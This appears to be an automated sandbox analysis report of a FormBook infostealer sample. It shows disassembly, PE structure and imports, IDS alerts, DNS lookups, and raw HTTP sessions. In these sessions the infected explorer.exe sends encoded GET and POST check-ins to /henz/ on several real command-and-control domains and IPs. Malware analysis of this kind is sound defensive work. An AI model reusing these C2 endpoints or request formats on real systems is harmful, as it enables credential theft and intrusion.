                                                push 004091CCh
                                                call 00007F51E0A3124Eh
                                                push 0000000Dh
                                                call 00007F51E0A312B1h
                                                push 0000000Bh
                                                call 00007F51E0A312AAh
                                                mov dword ptr [00423F84h], eax
                                                call dword ptr [00407034h]
                                                push ebx
                                                call dword ptr [00407270h]
                                                mov dword ptr [00424038h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+34h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 0041F538h
                                                call dword ptr [00407160h]
                                                push 004091C0h
                                                push 00423780h
                                                call 00007F51E0A30EE1h
                                                call dword ptr [004070B0h]
                                                mov ebp, 0042A000h
                                                push eax
                                                push ebp
                                                call 00007F51E0A30ECFh
                                                push ebx
                                                call dword ptr [00407144h]
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73cc | 0xa0 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0x9e0 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x1000 | 0x5c4a | 0x5e00 | False | 0.659906914893617 | data | 6.410763775060762 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata | 0x7000 | 0x115e | 0x1200 | False | 0.4466145833333333 | data | 5.142548180775325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data | 0x9000 | 0x1b078 | 0x600 | False | 0.455078125 | data | 4.2252195571372315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc | 0x2d000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.509328731926377 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                Name | RVA | Size | Type | Language | Country
                                                RT_ICON | 0x2d190 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States
                                                RT_DIALOG | 0x2d478 | 0x100 | data | English | United States
                                                RT_DIALOG | 0x2d578 | 0x11c | data | English | United States
                                                RT_DIALOG | 0x2d698 | 0x60 | data | English | United States
                                                RT_GROUP_ICON | 0x2d6f8 | 0x14 | data | English | United States
                                                RT_MANIFEST | 0x2d710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines (716), with no line terminators | English | United States
                                                DLL | Import
                                                KERNEL32.dll | SetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
                                                USER32.dll | GetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
                                                GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                Language of compilation system | Country where language is spoken | Map
                                                English | United States |
                                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                11/30/22-01:25:33.429382 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49699 | 80 | 192.168.2.4 | 162.214.129.149
                                                11/30/22-01:25:33.429382 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49699 | 80 | 192.168.2.4 | 162.214.129.149
                                                11/30/22-01:25:25.388400 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49697 | 80 | 192.168.2.4 | 206.233.197.135
                                                11/30/22-01:25:25.388400 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49697 | 80 | 192.168.2.4 | 206.233.197.135
                                                11/30/22-01:25:33.429382 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49699 | 80 | 192.168.2.4 | 162.214.129.149
                                                11/30/22-01:25:25.388400 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49697 | 80 | 192.168.2.4 | 206.233.197.135
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 30, 2022 01:25:17.332652092 CET | 192.168.2.4 | 8.8.8.8 | 0xb919 | Standard query (0) | www.eufidelizo.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:25:22.682940006 CET | 192.168.2.4 | 8.8.8.8 | 0xf6a5 | Standard query (0) | www.lyonfinancialusa.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:25:30.889216900 CET | 192.168.2.4 | 8.8.8.8 | 0xcf4c | Standard query (0) | www.afterdarksocial.club | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:25:38.630486965 CET | 192.168.2.4 | 8.8.8.8 | 0xffbe | Standard query (0) | www.patrickguarte.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:25:46.529058933 CET | 192.168.2.4 | 8.8.8.8 | 0xb251 | Standard query (0) | www.19t221013d.tokyo | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:25:48.363827944 CET | 192.168.2.4 | 8.8.8.8 | 0x878e | Standard query (0) | www.19t221013d.tokyo | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:25:54.045008898 CET | 192.168.2.4 | 8.8.8.8 | 0x55e9 | Standard query (0) | www.brennancorps.info | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:26:01.252393007 CET | 192.168.2.4 | 8.8.8.8 | 0xcecd | Standard query (0) | www.lopezmodeling.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:26:08.846963882 CET | 192.168.2.4 | 8.8.8.8 | 0xca60 | Standard query (0) | www.foxwhistle.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 30, 2022 01:25:17.350507975 CET | 8.8.8.8 | 192.168.2.4 | 0xb919 | No error (0) | www.eufidelizo.com | eufidelizo.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2022 01:25:17.350507975 CET | 8.8.8.8 | 192.168.2.4 | 0xb919 | No error (0) | eufidelizo.com |  | 192.185.217.47 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:25:22.855253935 CET | 8.8.8.8 | 192.168.2.4 | 0xf6a5 | No error (0) | www.lyonfinancialusa.com |  | 206.233.197.135 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:25:31.057456017 CET | 8.8.8.8 | 192.168.2.4 | 0xcf4c | No error (0) | www.afterdarksocial.club |  | 162.214.129.149 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:25:38.799020052 CET | 8.8.8.8 | 192.168.2.4 | 0xffbe | No error (0) | www.patrickguarte.com |  | 155.159.61.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:25:47.344357967 CET | 8.8.8.8 | 192.168.2.4 | 0xb251 | Server failure (2) | www.19t221013d.tokyo | none | none | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:25:48.895919085 CET | 8.8.8.8 | 192.168.2.4 | 0x878e | Server failure (2) | www.19t221013d.tokyo | none | none | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:25:54.096646070 CET | 8.8.8.8 | 192.168.2.4 | 0x55e9 | No error (0) | www.brennancorps.info | brennancorps.info |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2022 01:25:54.096646070 CET | 8.8.8.8 | 192.168.2.4 | 0x55e9 | No error (0) | brennancorps.info |  | 2.57.90.16 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:26:01.374481916 CET | 8.8.8.8 | 192.168.2.4 | 0xcecd | No error (0) | www.lopezmodeling.com | lopezmodeling.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2022 01:26:01.374481916 CET | 8.8.8.8 | 192.168.2.4 | 0xcecd | No error (0) | lopezmodeling.com |  | 192.185.35.86 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 01:26:09.028095007 CET | 8.8.8.8 | 192.168.2.4 | 0xca60 | No error (0) | www.foxwhistle.com |  | 154.22.100.62 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49695 | 192.185.217.47 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 01:25:17.530616999 CET | 92 | OUT | GET /henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.eufidelizo.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
Nov 30, 2022 01:25:17.671255112 CET | 93 | IN | HTTP/1.1 404 Not Found
                                                Date: Wed, 30 Nov 2022 00:25:17 GMT
                                                Server: Apache
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Last-Modified: Thu, 29 Sep 2022 21:55:23 GMT
                                                Accept-Ranges: bytes
                                                Content-Length: 11816
                                                Vary: Accept-Encoding
                                                Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49696 | 206.233.197.135 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 01:25:23.108675003 CET | 106 | OUT | POST /henz/ HTTP/1.1
                                                Host: www.lyonfinancialusa.com
                                                Connection: close
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Origin: http://www.lyonfinancialusa.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.lyonfinancialusa.com/henz/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Ascii: 4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-KM0O2_80WLakROeQLw).
Nov 30, 2022 01:25:23.608623028 CET | 107 | IN | HTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:25:23 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/8.0.8
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: https://www.lyonfinancialusa.com/henz/
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49705 | 192.185.35.86 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 01:26:03.650060892 CET | 124 | OUT | GET /henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.lopezmodeling.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
Nov 30, 2022 01:26:03.794171095 CET | 126 | IN | HTTP/1.1 404 Not Found
                                                Date: Wed, 30 Nov 2022 00:26:03 GMT
                                                Server: Apache
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                Set-Cookie: PHPSESSID=642acd1bd4e5af4738220f65563c7d37; path=/; HttpOnly
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.4 | 49706 | 154.22.100.62 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 01:26:09.202491999 CET | 129 | OUT | POST /henz/ HTTP/1.1
                                                Host: www.foxwhistle.com
                                                Connection: close
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Origin: http://www.foxwhistle.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.foxwhistle.com/henz/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Ascii: 4hq=uKJ3qgoQjSSIl72SWRbxmJfyb-CHZadDqFjxHXw93iCfjbeERT92LYSE3AM8c3aZg8CKmGjjDF19Cq3i516b4LacAZL1wzExwpyVHRkbOS~qA3XaJ7k7btmEK8nE53toV7lVr6PIBTWwX9vFbGgL~HpGEtO-sr35~7QgKdrHAtH4lG~BWg).
Nov 30, 2022 01:26:09.375113010 CET | 130 | IN | HTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:23:55 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                12 | 192.168.2.4 | 49707 | 154.22.100.62 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 30, 2022 01:26:11.437297106 CET | 131 | OUT | GET /henz/?4hq=jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5uiLrR0YNz1ez7r/FQUV2GqKIrgsyQUbvld7C5UuQUlYsY6nmozac85OtAKDr0AUC2A==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.foxwhistle.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 30, 2022 01:26:11.609244108 CET | 132 | IN | HTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:23:57 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Ascii: 620<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset><script>var _hmt = _hmt || [];(function() { var hm = document.
                                                Nov 30, 2022 01:26:11.609267950 CET | 133 | IN | Data Raw: 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 64 30 37 36 36 34 31 33 63 36 36 36 65 33 39 34 66
                                                Data Ascii: createElement("script"); hm.src = "https://hm.baidu.com/hm.js?d0766413c666e394f861185086d7f52f"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script src="http://206.119.1
                                                Nov 30, 2022 01:26:11.609283924 CET | 133 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                2 | 192.168.2.4 | 49697 | 206.233.197.135 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 30, 2022 01:25:25.388400078 CET | 107 | OUT | GET /henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.lyonfinancialusa.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 30, 2022 01:25:25.881593943 CET | 108 | IN | HTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:25:25 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/8.0.8
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: https://www.lyonfinancialusa.com/henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                3 | 192.168.2.4 | 49698 | 162.214.129.149 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 30, 2022 01:25:31.228866100 CET | 109 | OUT | POST /henz/ HTTP/1.1
                                                Host: www.afterdarksocial.club
                                                Connection: close
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Origin: http://www.afterdarksocial.club
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.afterdarksocial.club/henz/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 34 68 71 3d 78 52 42 4e 59 66 6f 55 79 47 73 48 35 70 57 58 50 6b 34 67 55 52 30 62 31 78 47 6c 43 71 63 4a 6e 59 6f 75 65 4c 76 44 52 72 55 33 4c 74 52 78 78 42 4f 4b 54 58 37 56 68 44 53 6c 43 70 65 6a 56 38 35 48 73 5a 4b 50 31 65 30 39 69 47 6e 2d 6f 31 4c 7a 5a 54 4e 45 43 76 72 32 5a 51 63 57 66 59 35 34 36 45 77 73 4f 4d 41 54 43 73 4d 74 53 42 49 37 47 4f 4a 51 66 32 30 47 45 70 37 30 66 39 31 5f 75 6d 4e 79 4e 75 31 32 74 77 56 64 37 5a 42 4f 4f 71 62 36 35 79 43 5f 53 4c 32 6a 4d 79 37 32 35 65 52 55 37 4f 77 73 68 47 53 56 63 41 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 4hq=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jMy725eRU7OwshGSVcA).
                                                Nov 30, 2022 01:25:31.398947954 CET | 110 | IN | HTTP/1.1 404 Not Found
                                                Date: Wed, 30 Nov 2022 00:25:31 GMT
                                                Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
                                                Accept-Ranges: bytes
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html
                                                Data Ascii: 1195<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <title>579404 Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; background-color:#367E8E; scrollbar-base-color: #005B70; scrollbar-arrow-color: #F3960B; scrollbar-DarkShadow-Color: #000000; color: #FFFFFF;margin:0; } a { color:#021f25; text-decoration:none} h1 { font-size: 18px; color: #FB9802; padding-bottom: 10px; background-image: url(sys_cpanel/images/bottombody.jpg); background-repeat: repeat-x; padding:5px 0 10px 15px;margin:0; } #body-content p { padding-left: 25px; padding-right: 25px;
                                                Nov 30, 2022 01:25:31.398994923 CET | 112 | IN | Data Raw: 20 20 20 20 20 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a
                                                Data Ascii: line-height: 18px; padding-top: 5px; padding-bottom: 5px; } h2 { font-size: 14px; font-weight: bold; color: #FF9900; padding-left: 15px; } </style> </hea
                                                Nov 30, 2022 01:25:31.399027109 CET | 112 | IN | Data Raw: 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: > </body></html>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                4 | 192.168.2.4 | 49699 | 162.214.129.149 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 30, 2022 01:25:33.429382086 CET | 112 | OUT | GET /henz/?4hq=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/EbwlnLs/kdjkkcQ==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.afterdarksocial.club
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 30, 2022 01:25:33.599673986 CET | 114 | IN | HTTP/1.1 404 Not Found
                                                Date: Wed, 30 Nov 2022 00:25:33 GMT
                                                Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
                                                Accept-Ranges: bytes
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html
                                                Data Ascii: 1195<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <title>579404 Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; background-color:#367E8E; scrollbar-base-color: #005B70; scrollbar-arrow-color: #F3960B; scrollbar-DarkShadow-Color: #000000; color: #FFFFFF;margin:0; } a { color:#021f25; text-decoration:none} h1 { font-size: 18px; color: #FB9802; padding-bottom: 10px; background-image: url(sys_cpanel/images/bottombody.jpg); background-repeat: repeat-x; padding:5px 0 10px 15px;margin:0; } #body-content p { padding-left: 25px; padding-right: 25px;
                                                Nov 30, 2022 01:25:33.599761009 CET | 115 | IN | Data Raw: 20 20 20 20 20 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a
                                                Data Ascii: line-height: 18px; padding-top: 5px; padding-bottom: 5px; } h2 { font-size: 14px; font-weight: bold; color: #FF9900; padding-left: 15px; } </style> </hea
                                                Nov 30, 2022 01:25:33.599796057 CET | 115 | IN | Data Raw: 57 65 62 4d 61 73 74 65 72 3c 2f 61 3e 2e 0a 3c 2f 70 3e 0a 3c 68 72 20 2f 3e 0a 0d 0a 65 39 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 32 35 20 28 55 6e 69 78 29 20 6d 6f 64 5f 73 73 6c 2f 32 2e 32 2e 32 35 20 4f 70 65 6e
                                                Data Ascii: WebMaster</a>.</p><hr />e9<address>Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.afterdarksocial.club Port 80</address>... end content --> </


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                5 | 192.168.2.4 | 49700 | 155.159.61.221 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 30, 2022 01:25:39.010220051 CET | 117 | OUT | POST /henz/ HTTP/1.1
                                                Host: www.patrickguarte.com
                                                Connection: close
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Origin: http://www.patrickguarte.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.patrickguarte.com/henz/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
